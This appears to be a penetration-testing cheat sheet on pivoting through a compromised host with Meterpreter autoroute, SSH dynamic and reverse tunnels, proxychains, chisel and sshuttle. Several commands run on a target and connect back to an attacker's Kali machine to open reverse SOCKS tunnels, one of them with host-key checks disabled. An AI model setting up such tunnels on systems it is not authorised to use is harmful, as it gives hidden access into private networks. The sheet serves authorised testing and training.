ssh tunnel
NOTE: needs valid SSH creds on box to pivot from.
meterpreter tunnel
# to print existing routes
autoroute -p
run autoroute [-s IP/CIDR]
[OR]
use post/multi/manage/autoroute
# use auxiliary/server/socks_proxy
ssh tunnel:
Forward tunnel (outgoing)
ssh user@IP -D PORT
# this sets up a tunnel between localhost:TUNNEL-PORT and target
# any requests to localhost:TUNNEL-PORT is routed via target
Reverse tunnel (incoming)
authorized_keys file
from="IP",command="echo 'This account can only be used for Port Forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <SSH-PUBLIC-key>
Command
# for allowing a connecting to your port from outside (incoming)
ssh -fN -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -R PORT -i <id_rsa> KALI-USER@KALI-IP
# -N: not running commands
# -f: go to background
# UserKnownHostsFile=/dev/null & StrictHostKeyChecking=no will not ask kali password; not safe to enter password on target.
Proxychains
/etc/proxychains4.conf
# add line for socks4/5 proxy
[socks4|socks5] 127.0.0.1 6900
# comment out proxy_dns to avoid nmap hanging
Now, run any command using $ proxychains4 [command]
proxychains4 for browser
Set up a foxyproxy configuration for browser:
Title: proxychains
Proxy Type: SOCKS4
Proxy IP: localhost
Port: 6900
chisel tunnel
Reverse socks proxy
NOTE: configure proxychains using socks5 IP PORT
.
# server on kali
chisel server -p 8000 --reverse
# on target
# tunnel using chisel on kali:1080
chisel client KALI_IP:8000 R:socks
Forward socks proxy
# server on target
chisel server -p 8000 --socks5
# on kali
chisel client TARGET_IP:8000 TUNNEL_PORT:socks
sshuttle tunnel
REQUIREMENTS:
Works only on linux targets
SSH access to target
Python on target (static binary works)
sshuttle -r USER@TARGET_IP [SUBNET/CIDR | -N] [--ssh-cmd "ssh -i KEY"] -x TARGET_IP
# -N: auto identify based on targers routing table
# -x: used to exclude current box from forward all subnet traffic
Last updated
Was this helpful?